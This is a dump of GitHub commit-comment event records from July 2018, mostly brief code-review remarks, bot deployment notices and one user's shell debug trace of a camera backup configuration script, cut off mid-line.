{"id":"7905090531","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kurtipeter"},"payload":{"comment":{"id":29562486,"position":30,"line":30,"path":"week-07/Day-04/CharacterClub/CharacterClub/Controllers/HomeController.cs","commit_id":"8a821ec214f97e7898a730b63a1724016289ff75","created_at":"2018-07-02T08:03:43Z","updated_at":"2018-07-02T08:03:43Z","author_association":"NONE","body":"remove or implement it, but do not left comments is the code for the weekend 🍭 "}},"created_at":"2018-07-02T08:03:43Z"}
{"id":"7905092656","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kurtipeter"},"payload":{"comment":{"id":29562489,"position":60,"line":60,"path":"week-07/Day-04/CharacterClub/CharacterClub/Controllers/HomeController.cs","commit_id":"8a821ec214f97e7898a730b63a1724016289ff75","created_at":"2018-07-02T08:04:12Z","updated_at":"2018-07-02T08:04:12Z","author_association":"NONE","body":"add new line at the end of a file"}},"created_at":"2018-07-02T08:04:12Z"}
{"id":"7905093013","type":"CommitCommentEvent","actor":{"login":"ms2sato"},"repo":{"name":"tomoharutsutsumi/class_practice"},"payload":{"comment":{"id":29562491,"position":22,"line":189,"path":"ruby_fourth.rb","commit_id":"87f507d734ecd8cc590a053c9943e61f683b4da1","created_at":"2018-07-02T08:04:17Z","updated_at":"2018-07-02T08:04:17Z","author_association":"COLLABORATOR","body":"ここで、 connector という名前が二重の意味を持ってしまうのって理解できてますかね。これまでも `connector` という名前を使いすぎているのを目をつぶっていたのですが、適切そうな変数名を考えてつけましょう。"}},"created_at":"2018-07-02T08:04:17Z"}
{"id":"7905095540","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kurtipeter"},"payload":{"comment":{"id":29562492,"position":18,"line":18,"path":"week-07/Day-04/CharacterClub/CharacterClub/Services/HomeService.cs","commit_id":"8a821ec214f97e7898a730b63a1724016289ff75","created_at":"2018-07-02T08:04:52Z","updated_at":"2018-07-02T08:04:52Z","author_association":"NONE","body":"remove new line here"}},"created_at":"2018-07-02T08:04:52Z"}
{"id":"7905096265","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kurtipeter"},"payload":{"comment":{"id":29562493,"position":15,"line":15,"path":"week-07/Day-04/CharacterClub/CharacterClub/Services/HomeService.cs","commit_id":"8a821ec214f97e7898a730b63a1724016289ff75","created_at":"2018-07-02T08:05:02Z","updated_at":"2018-07-02T08:05:02Z","author_association":"NONE","body":"nice 🍬 "}},"created_at":"2018-07-02T08:05:02Z"}
{"id":"7905097333","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29562494,"position":1,"line":1,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/configuration/AgentConfigurationLandscape.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:05:16Z","updated_at":"2018-07-02T08:05:16Z","author_association":"OWNER","body":"This whole file must be kept"}},"created_at":"2018-07-02T08:05:16Z"}
{"id":"7905098948","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kurtipeter"},"payload":{"comment":{"id":29562499,"position":3,"line":3,"path":"week-07/Day-04/CharacterClub/CharacterClub/Views/Home/Login.cshtml","commit_id":"8a821ec214f97e7898a730b63a1724016289ff75","created_at":"2018-07-02T08:05:39Z","updated_at":"2018-07-02T08:05:39Z","author_association":"NONE","body":"what does `ViewData` do here? How does it work?"}},"created_at":"2018-07-02T08:05:39Z"}
{"id":"7905100667","type":"CommitCommentEvent","actor":{"login":"ConsularGull"},"repo":{"name":"sultanxda/android_kernel_google_wahoo"},"payload":{"comment":{"id":29562503,"position":null,"line":null,"path":null,"commit_id":"0a737ab6ec5267e8e4414cb7c58cb17e7b9ecebc","created_at":"2018-07-02T08:06:04Z","updated_at":"2018-07-02T08:06:04Z","author_association":"NONE","body":"The kernel config check is done through Android Vendor Test Suite. See platform/test/vts-testcase/kernel in AOSP. It is applied to the whole OS through the compatibility matrix. The main purpose is the OS integrity. You basically have to rebuild the whole OS with updated configs and create new factory images and flash to the device in order to satisfy these tests, not only the kernel."}},"created_at":"2018-07-02T08:06:04Z"}
{"id":"7905102310","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kurtipeter"},"payload":{"comment":{"id":29562507,"position":null,"line":null,"path":null,"commit_id":"4d3ea5a93a8b1464f0947406cd39636ffa3abfe3","created_at":"2018-07-02T08:06:26Z","updated_at":"2018-07-02T08:06:26Z","author_association":"NONE","body":"Nice clear commit message :D"}},"created_at":"2018-07-02T08:06:26Z"}
{"id":"7905102873","type":"CommitCommentEvent","actor":{"login":"maleke9"},"repo":{"name":"gregoryseibert/DHBW-SE-Projekt"},"payload":{"comment":{"id":29562509,"position":null,"line":null,"path":null,"commit_id":"85b2296665d1b539e4ee023125fafdd16bcd7d9d","created_at":"2018-07-02T08:06:34Z","updated_at":"2018-07-02T08:06:34Z","author_association":"COLLABORATOR","body":"schaetzkonfiguration in workdir abspeichern --> relativer pfad zu der config ? Brauch man überhaupt mehrere Schaetzkonfigurationen?"}},"created_at":"2018-07-02T08:06:34Z"}
{"id":"7905103907","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29562510,"position":null,"line":null,"path":null,"commit_id":"66a18b2b700c24448c0bf1e7dbe7b5e8e3139559","created_at":"2018-07-02T08:06:49Z","updated_at":"2018-07-02T08:06:49Z","author_association":"OWNER","body":"#11 "}},"created_at":"2018-07-02T08:06:49Z"}
{"id":"7905105521","type":"CommitCommentEvent","actor":{"login":"fantix"},"repo":{"name":"sloria/cookiecutter-flask"},"payload":{"comment":{"id":29562512,"position":25,"line":25,"path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/database.py","commit_id":"73281860865e0c1ed5ba806f6ce504a2c1e2c4c1","created_at":"2018-07-02T08:07:10Z","updated_at":"2018-07-02T08:07:10Z","author_association":"NONE","body":"This way, because `save()` has a default `commit=True`, it is then impossible to use `create()` within an explicit transaction defined by user. The `commit` parameter should also available on `create()` too.\r\n\r\nFurthermore, I think it is not proper to have `commit=True` by default - it is trading too much explicitness for convenience. Users should be encouraged to manage transactions on their own, or at least be aware when transactions end."}},"created_at":"2018-07-02T08:07:10Z"}
{"id":"7905105761","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/kurtipeter"},"payload":{"comment":{"id":29562513,"position":4,"line":13,"path":"week-07/Day-02/BankOfSimba/BankOfSimba/Controllers/HomeController.cs","commit_id":"4d3ea5a93a8b1464f0947406cd39636ffa3abfe3","created_at":"2018-07-02T08:07:12Z","updated_at":"2018-07-02T08:07:12Z","author_association":"NONE","body":"What does `[Route(\"\")]` do here?"}},"created_at":"2018-07-02T08:07:12Z"}
{"id":"7905106049","type":"CommitCommentEvent","actor":{"login":"winza53"},"repo":{"name":"Microsoft/AppCenter-SDK-Android"},"payload":{"comment":{"id":29562515,"position":null,"line":null,"path":null,"commit_id":"5c12f6b34123917f0490875f1e7b55f6c8adc235","created_at":"2018-07-02T08:07:16Z","updated_at":"2018-07-02T08:07:16Z","author_association":"NONE","body":"Hello there thanks for helping "}},"created_at":"2018-07-02T08:07:16Z"}
{"id":"7905107998","type":"CommitCommentEvent","actor":{"login":"sakairi-takashi"},"repo":{"name":"sakairi-takashi/sample-cloud-native-toolchain-tutorial-20180702022106424"},"payload":{"comment":{"id":29562516,"position":null,"line":null,"path":null,"commit_id":"a2f64720815c726da1849e7d715856e504bdebb5","created_at":"2018-07-02T08:07:44Z","updated_at":"2018-07-02T08:07:44Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8181c087-ddb8-4d16-ab40-66498955d0ad?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180702022106424\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1857b5cc-93e2-4070-8238-894efc95e889?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180702022106424\") deployed [sample-cloud-native-toolchain-tutorial-20180702022106424](https://github.com/sakairi-takashi/sample-cloud-native-toolchain-tutorial-20180702022106424/releases/tag/deploy-ibm-yp-us-south-sakairi-jp.ibm.com-test-20180702-080743 \"deploy-ibm-yp-us-south-sakairi-jp.ibm.com-test-20180702-080743\") to [test](https://console.bluemix.net/apps/63a24be6-4c90-4715-adef-86dc2d4b0bac?env_id=ibm:yp:us-south \"ibm:yp:us-south:sakairi@jp.ibm.com:test\"), including this commit"}},"created_at":"2018-07-02T08:07:44Z"}
{"id":"7905111847","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29562517,"position":14,"line":48,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/executors/AbstractClientExecutor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:08:40Z","updated_at":"2018-07-02T08:08:40Z","author_association":"OWNER","body":"This line must be kept"}},"created_at":"2018-07-02T08:08:40Z"}
{"id":"7905113120","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29562518,"position":26,"line":89,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/executors/AbstractClientExecutor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:08:57Z","updated_at":"2018-07-02T08:08:57Z","author_association":"OWNER","body":"This line must be kept"}},"created_at":"2018-07-02T08:08:57Z"}
{"id":"7905114650","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29562521,"position":37,"line":142,"path":"agent/webapps/client/src/main/java/com/axway/ats/agent/webapp/client/executors/AbstractClientExecutor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T08:09:18Z","updated_at":"2018-07-02T08:09:18Z","author_association":"OWNER","body":"This must be kept"}},"created_at":"2018-07-02T08:09:18Z"}
{"id":"7905118104","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"sompylasar/prettier"},"payload":{"comment":{"id":29562538,"position":null,"line":null,"path":null,"commit_id":"e9f489cea1336ffdb2606540cb742d43864f0792","created_at":"2018-07-02T08:10:05Z","updated_at":"2018-07-02T08:10:05Z","author_association":"OWNER","body":"👍 "}},"created_at":"2018-07-02T08:10:05Z"}
{"id":"7905125395","type":"CommitCommentEvent","actor":{"login":"sakairi-takashi"},"repo":{"name":"sakairi-takashi/sample-cloud-native-toolchain-tutorial-20180702022106424"},"payload":{"comment":{"id":29562543,"position":null,"line":null,"path":null,"commit_id":"a2f64720815c726da1849e7d715856e504bdebb5","created_at":"2018-07-02T08:11:42Z","updated_at":"2018-07-02T08:11:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8181c087-ddb8-4d16-ab40-66498955d0ad?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180702022106424\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/1857b5cc-93e2-4070-8238-894efc95e889?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180702022106424\") deployed [sample-cloud-native-toolchain-tutorial-20180702022106424](https://github.com/sakairi-takashi/sample-cloud-native-toolchain-tutorial-20180702022106424/releases/tag/deploy-ibm-yp-us-south-sakairi-jp.ibm.com-prod-20180702-081141 \"deploy-ibm-yp-us-south-sakairi-jp.ibm.com-prod-20180702-081141\") to [prod](https://console.bluemix.net/apps/34274c0d-693d-4182-9884-eb2e4e5d330f?env_id=ibm:yp:us-south \"ibm:yp:us-south:sakairi@jp.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-02T08:11:42Z"}
{"id":"7905129468","type":"CommitCommentEvent","actor":{"login":"chawoohong"},"repo":{"name":"summer-sb/MureokMureok"},"payload":{"comment":{"id":29562549,"position":5,"line":47,"path":"app/build.gradle","commit_id":"08e77ce2bc3bcc72728e9320e5d9ad2773de5215","created_at":"2018-07-02T08:12:37Z","updated_at":"2018-07-02T08:12:37Z","author_association":"COLLABORATOR","body":"rxjava2도 별도의 implementation 구문으로 참조해주세요"}},"created_at":"2018-07-02T08:12:37Z"}
{"id":"7905130060","type":"CommitCommentEvent","actor":{"login":"shengxia-xl"},"repo":{"name":"shengxia-xl/ToolRepository"},"payload":{"comment":{"id":29562552,"position":null,"line":null,"path":null,"commit_id":"5179a0783b8a8819a6cd131fdedd013ebf7b2166","created_at":"2018-07-02T08:12:45Z","updated_at":"2018-07-02T08:12:45Z","author_association":"OWNER","body":" git config --global credential.helper store\r\n\r\n输入命令后，首次输入账号密码提交后，之后的提交不需要输入账号密码"}},"created_at":"2018-07-02T08:12:45Z"}
{"id":"7905146553","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29562582,"position":null,"line":null,"path":null,"commit_id":"ba34c2e65fd7037a4f9970525508ebeaf5d33ea5","created_at":"2018-07-02T08:16:17Z","updated_at":"2018-07-02T08:16:17Z","author_association":"COLLABORATOR","body":"Puzzle `1105-a65697ae` disappeared from [`src/main/groovy/com/zerocracy/stk/package-info.java`](https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/package-info.java), that's why I closed #1152. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-02T08:16:17Z"}
{"id":"7905147910","type":"CommitCommentEvent","actor":{"login":"thiscoders"},"repo":{"name":"carllhw/odoo-hrp-dev-docker"},"payload":{"comment":{"id":29562583,"position":null,"line":null,"path":null,"commit_id":"546ba6b461f804a02eda05561d41ce4e6e58bc3b","created_at":"2018-07-02T08:16:34Z","updated_at":"2018-07-02T08:16:34Z","author_association":"NONE","body":"勇哥，为什么要移除pymqi包呢？"}},"created_at":"2018-07-02T08:16:34Z"}
{"id":"7905150683","type":"CommitCommentEvent","actor":{"login":"vexetron"},"repo":{"name":"shadowsocks/shadowsocks-libev"},"payload":{"comment":{"id":29562591,"position":null,"line":null,"path":null,"commit_id":"11a0d8db60fc200c7e6a0dd77fb4a02f8a8fe870","created_at":"2018-07-02T08:17:10Z","updated_at":"2018-07-02T08:17:10Z","author_association":"NONE","body":"Is this a necessary update?"}},"created_at":"2018-07-02T08:17:10Z"}
{"id":"7905156918","type":"CommitCommentEvent","actor":{"login":"jain221"},"repo":{"name":"jain221/TestGit"},"payload":{"comment":{"id":29562598,"position":null,"line":null,"path":null,"commit_id":"79078f1faaa188f2003ecb887652d28155c26225","created_at":"2018-07-02T08:18:34Z","updated_at":"2018-07-02T08:18:34Z","author_association":"OWNER","body":"this is readme file to read new content."}},"created_at":"2018-07-02T08:18:34Z"}
{"id":"7905171701","type":"CommitCommentEvent","actor":{"login":"cpury"},"repo":{"name":"Privalino/Privalino-Telegram"},"payload":{"comment":{"id":29562619,"position":6,"line":10,"path":"build.gradle","commit_id":"ad80b8c8fc14de043a62ba7c3ae0a821ec41ac30","created_at":"2018-07-02T08:21:39Z","updated_at":"2018-07-02T08:21:39Z","author_association":"CONTRIBUTOR","body":"Das sollten wir vor dem Release auch wieder reinnehmen."}},"created_at":"2018-07-02T08:21:39Z"}
{"id":"7905173813","type":"CommitCommentEvent","actor":{"login":"mavigdor"},"repo":{"name":"Gigaspaces/docker"},"payload":{"comment":{"id":29562622,"position":44,"line":155,"path":"insightedge-enterprise/README.md","commit_id":"83488cd679dcb6b3ecdb9c60e2b9a3b4ce375723","created_at":"2018-07-02T08:22:07Z","updated_at":"2018-07-02T08:22:07Z","author_association":"NONE","body":"typo imsightedge-submit"}},"created_at":"2018-07-02T08:22:07Z"}
{"id":"7905175523","type":"CommitCommentEvent","actor":{"login":"madnik"},"repo":{"name":"CocoaPods/Specs"},"payload":{"comment":{"id":29562623,"position":null,"line":null,"path":null,"commit_id":"7fee7138705f93f8d9667b0358709fbab2ce0cb3","created_at":"2018-07-02T08:22:29Z","updated_at":"2018-07-02T08:22:29Z","author_association":"NONE","body":"@af-builder any particular reason why this version is removed? "}},"created_at":"2018-07-02T08:22:29Z"}
{"id":"7905177209","type":"CommitCommentEvent","actor":{"login":"mavigdor"},"repo":{"name":"Gigaspaces/docker"},"payload":{"comment":{"id":29562627,"position":5,"line":117,"path":"xap-enterprise/README.md","commit_id":"061784553e4a2e5d3134a1f8b4eaa817cfd6c418","created_at":"2018-07-02T08:22:51Z","updated_at":"2018-07-02T08:22:51Z","author_association":"NONE","body":"tryme without <>"}},"created_at":"2018-07-02T08:22:51Z"}
{"id":"7905203860","type":"CommitCommentEvent","actor":{"login":"Suki214"},"repo":{"name":"Suki214/LearnOOP"},"payload":{"comment":{"id":29562688,"position":null,"line":null,"path":null,"commit_id":"46158f670519bae77c8b08a7b45011c9d67d96a4","created_at":"2018-07-02T08:28:21Z","updated_at":"2018-07-02T08:28:21Z","author_association":"OWNER","body":"this an important demo includes UT, reflection, and WPF MVVM "}},"created_at":"2018-07-02T08:28:21Z"}
{"id":"7905206298","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29562694,"position":1,"line":1,"path":"bears/vcs/git/GitMergeInspectBear.py","commit_id":"1b395a8feafff7ee62c43d8c37c6bfc464161838","created_at":"2018-07-02T08:28:53Z","updated_at":"2018-07-02T08:28:53Z","author_association":"NONE","body":"Remove this newline"}},"created_at":"2018-07-02T08:28:53Z"}
{"id":"7905208096","type":"CommitCommentEvent","actor":{"login":"mavigdor"},"repo":{"name":"Gigaspaces/docker"},"payload":{"comment":{"id":29562697,"position":7,"line":27,"path":"insightedge-enterprise/Dockerfile","commit_id":"061784553e4a2e5d3134a1f8b4eaa817cfd6c418","created_at":"2018-07-02T08:29:16Z","updated_at":"2018-07-02T08:29:16Z","author_association":"NONE","body":"Why so many retries?!"}},"created_at":"2018-07-02T08:29:16Z"}
{"id":"7905210437","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29562707,"position":null,"line":null,"path":null,"commit_id":"dafeb95a138855041096f46a5348e06b9e61f2c9","created_at":"2018-07-02T08:29:46Z","updated_at":"2018-07-02T08:29:46Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#pr-118](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#pr-118).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-118-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-02T08:29:46Z"}
{"id":"7905213787","type":"CommitCommentEvent","actor":{"login":"engenegr"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29562719,"position":64,"line":408,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T08:30:28Z","updated_at":"2018-07-02T08:30:28Z","author_association":"OWNER","body":"Можно обнаружен. Это проще.\r\nЯ считаю, надо оставлять термины приватный и публичный ключ. Не знаю, они являлись результатом простого перевода или принятой терминологии когда-то, но эти два термина уже очень давно в русскоязычной литературе можно встретить."}},"created_at":"2018-07-02T08:30:28Z"}
{"id":"7905214762","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29562726,"position":23,"line":23,"path":"bears/vcs/git/GitMergeInspectBear.py","commit_id":"1b395a8feafff7ee62c43d8c37c6bfc464161838","created_at":"2018-07-02T08:30:40Z","updated_at":"2018-07-02T08:30:40Z","author_association":"NONE","body":"I think we don't need `organization` here as everyone can use it"}},"created_at":"2018-07-02T08:30:40Z"}
{"id":"7905222424","type":"CommitCommentEvent","actor":{"login":"engenegr"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29562754,"position":110,"line":433,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T08:32:20Z","updated_at":"2018-07-02T08:32:20Z","author_association":"OWNER","body":"Это такой же не простой термин, как dust. Если предложишь лучше, примем твой."}},"created_at":"2018-07-02T08:32:20Z"}
{"id":"7905224437","type":"CommitCommentEvent","actor":{"login":"HONGJICAI"},"repo":{"name":"sffxzzp/Steam-2018-SummerGame"},"payload":{"comment":{"id":29562760,"position":null,"line":null,"path":null,"commit_id":"f634d900090bb66482a7b5b70150efd335f5facf","created_at":"2018-07-02T08:32:46Z","updated_at":"2018-07-02T08:32:46Z","author_association":"NONE","body":"这个commit强啊"}},"created_at":"2018-07-02T08:32:46Z"}
{"id":"7905226952","type":"CommitCommentEvent","actor":{"login":"Atrist"},"repo":{"name":"Atrist/The-front-end-study"},"payload":{"comment":{"id":29562772,"position":null,"line":null,"path":null,"commit_id":"070723f9071d193b33528e5344e6bbc4a425edf0","created_at":"2018-07-02T08:33:19Z","updated_at":"2018-07-02T08:33:19Z","author_association":"OWNER","body":"comback"}},"created_at":"2018-07-02T08:33:19Z"}
{"id":"7905227037","type":"CommitCommentEvent","actor":{"login":"engenegr"},"repo":{"name":"engenegr/samourai-wallet-android"},"payload":{"comment":{"id":29562773,"position":113,"line":435,"path":"app/src/main/res/values-ru/strings.xml","commit_id":"818fa4d15d42d35051a32ad07b2161c2f52d4e30","created_at":"2018-07-02T08:33:20Z","updated_at":"2018-07-02T08:33:20Z","author_association":"OWNER","body":"Можно просто \"Блокировать предупреждения о повторных отправлениях на этот адрес?\""}},"created_at":"2018-07-02T08:33:20Z"}
{"id":"7905240632","type":"CommitCommentEvent","actor":{"login":"kasperisager"},"repo":{"name":"Siteimprove/alfa"},"payload":{"comment":{"id":29562810,"position":null,"line":null,"path":null,"commit_id":"1f2b9296b0eaed514c24be2ee5840a1d862b67e0","created_at":"2018-07-02T08:36:08Z","updated_at":"2018-07-02T08:36:08Z","author_association":"COLLABORATOR","body":"Apologies to whoever I just mentioned with this commit 🙈 "}},"created_at":"2018-07-02T08:36:08Z"}
{"id":"7905244715","type":"CommitCommentEvent","actor":{"login":"JanWielemaker"},"repo":{"name":"SWI-Prolog/packages-http"},"payload":{"comment":{"id":29562826,"position":null,"line":null,"path":null,"commit_id":"e1f18ba80fb2721dc1ba6c95bba375bb01c6ad6d","created_at":"2018-07-02T08:37:00Z","updated_at":"2018-07-02T08:37:00Z","author_association":"MEMBER","body":"Added a setting.  Default is `retry`, keeping the current behavior.  The alternative `exit` or `exit(Code)` can be used to pass control to the service supervisor.  You probably do not like a default you consider insecure.  Besides hacking the server, bringing it down using a DoS attack may be at least as serious, depending on the task and secrets held by the server.  Finally, if you manage to hack the server and can do as you please using the rights of the server you can also truncate the log file to hide your tracks."}},"created_at":"2018-07-02T08:37:00Z"}
{"id":"7905249057","type":"CommitCommentEvent","actor":{"login":"godmoves"},"repo":{"name":"godmoves/PhoenixGo"},"payload":{"comment":{"id":29562837,"position":null,"line":null,"path":null,"commit_id":"e6c8d6436e659429167b719ab82fa32b37ffb926","created_at":"2018-07-02T08:37:57Z","updated_at":"2018-07-02T08:37:57Z","author_association":"OWNER","body":"This \"undo\" op deletes all searching info that has been done before, we may need a more sophisticated one in the future."}},"created_at":"2018-07-02T08:37:57Z"}
{"id":"7905249137","type":"CommitCommentEvent","actor":{"login":"symroe"},"repo":{"name":"DemocracyClub/EveryElection"},"payload":{"comment":{"id":29562839,"position":45,"line":99,"path":"every_election/apps/elections/templates/elections/election_detail.html","commit_id":"dca00b711e4bbbe5937a8928e75a7300b6c92b63","created_at":"2018-07-02T08:37:58Z","updated_at":"2018-07-02T08:37:58Z","author_association":"CONTRIBUTOR","body":"Can these go on the model as properties? I'm thinking they might be used elsewhere, for example in the API "}},"created_at":"2018-07-02T08:37:58Z"}
{"id":"7905254061","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29562859,"position":null,"line":null,"path":null,"commit_id":"8380e9040107e940ee4005a6901e1aee541aee59","created_at":"2018-07-02T08:38:55Z","updated_at":"2018-07-02T08:38:55Z","author_association":"COLLABORATOR","body":"Puzzle `1215-4176ce2c` disappeared from [`src/main/java/com/zerocracy/farm/StkSafe.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/farm/StkSafe.java), that's why I closed #1245. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-02T08:38:55Z"}
{"id":"7905265034","type":"CommitCommentEvent","actor":{"login":"symroe"},"repo":{"name":"DemocracyClub/EveryElection"},"payload":{"comment":{"id":29562893,"position":5,"line":88,"path":"every_election/apps/elections/templates/elections/election_detail.html","commit_id":"24439e885d2d1ffb0ef0bf9b0a1adf176266b1d5","created_at":"2018-07-02T08:41:13Z","updated_at":"2018-07-02T08:41:13Z","author_association":"CONTRIBUTOR","body":"Somewhat related: do you know a service that renders geoJSON at a URL? It's super handy to see the boundary sometimes, so previding a link to the data on a map would be great (of course we could just do it ourselves) "}},"created_at":"2018-07-02T08:41:13Z"}
{"id":"7905271767","type":"CommitCommentEvent","actor":{"login":"wathanyu40"},"repo":{"name":"wathanyu40/test-git"},"payload":{"comment":{"id":29562914,"position":null,"line":null,"path":null,"commit_id":"5cac671fbf5d9c5563fa726389013ebab88fca5c","created_at":"2018-07-02T08:42:33Z","updated_at":"2018-07-02T08:42:33Z","author_association":"OWNER","body":"![1243](https://user-images.githubusercontent.com/40757163/42153873-7fb7a9da-7e0e-11e8-8c4f-ae113b5cbbc1.jpg)\r\n"}},"created_at":"2018-07-02T08:42:33Z"}
{"id":"7905274168","type":"CommitCommentEvent","actor":{"login":"hxqqqqqq"},"repo":{"name":"TheMagician1/redmine_backlogs"},"payload":{"comment":{"id":29562934,"position":null,"line":null,"path":null,"commit_id":"75b8c77a95e671e0efbb6deb89fc500167057652","created_at":"2018-07-02T08:43:00Z","updated_at":"2018-07-02T08:43:00Z","author_association":"NONE","body":"when i install this plugin ,the error like that. when i excec \"bundle  install\"  the error like that. how can help me?"}},"created_at":"2018-07-02T08:43:00Z"}
{"id":"7905275337","type":"CommitCommentEvent","actor":{"login":"gapsong"},"repo":{"name":"gapsong/BitmapServer"},"payload":{"comment":{"id":29562935,"position":null,"line":null,"path":null,"commit_id":"11a4cf73085b08e7cdbb9b2559d3cc767c2a0bb3","created_at":"2018-07-02T08:43:15Z","updated_at":"2018-07-02T08:43:15Z","author_association":"OWNER","body":"test it out"}},"created_at":"2018-07-02T08:43:15Z"}
{"id":"7905278570","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29562944,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-02T08:43:54Z","updated_at":"2018-07-02T08:43:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T08:43:54Z"}
{"id":"7905278575","type":"CommitCommentEvent","actor":{"login":"Alvipe"},"repo":{"name":"Alvipe/Open-Myo"},"payload":{"comment":{"id":29562945,"position":null,"line":null,"path":null,"commit_id":"d2d86628087b929ccdddc727e94e3c77fc937755","created_at":"2018-07-02T08:43:54Z","updated_at":"2018-07-02T08:43:54Z","author_association":"OWNER","body":"If I knew it would be fixed already."}},"created_at":"2018-07-02T08:43:54Z"}
{"id":"7905278855","type":"CommitCommentEvent","actor":{"login":"mfizz1"},"repo":{"name":"bobi/xiaomi_gdrive"},"payload":{"comment":{"id":29562947,"position":null,"line":null,"path":null,"commit_id":"b75cd49d28b980d9d7fe6ed4502a3a728e761a62","created_at":"2018-07-02T08:43:58Z","updated_at":"2018-07-02T08:43:58Z","author_association":"NONE","body":"finally I found somewhere to comment. Its appropriate too as I believe the curl is the issue, I am using 47US and I attach the sh -x below:\r\n\r\n` # sh -x /tmp/sd/gdrive/GDriveConf\r\n+ gdrive_dir=/tmp/sd/gdrive/\r\n+ echo Configuration is started. Wait for several seconds.\r\nConfiguration is started. Wait for several seconds.\r\n+ [ ! -d /tmp/sd/gdrive/conf ]\r\n+ [ ! -d /tmp/sd/gdrive/log ]\r\n+ [ ! -d /tmp/sd/gdrive/tmp ]\r\n+ [ ! -d /tmp/sd/yi-hack-v3/lib ]\r\n+ [ ! -d /tmp/sd/yi-hack-v3/bin ]\r\n+ cp /tmp/sd/gdrive/yi-hack-v3/lib/libz.so.1 /tmp/sd/yi-hack-v3/lib/\r\n+ cp 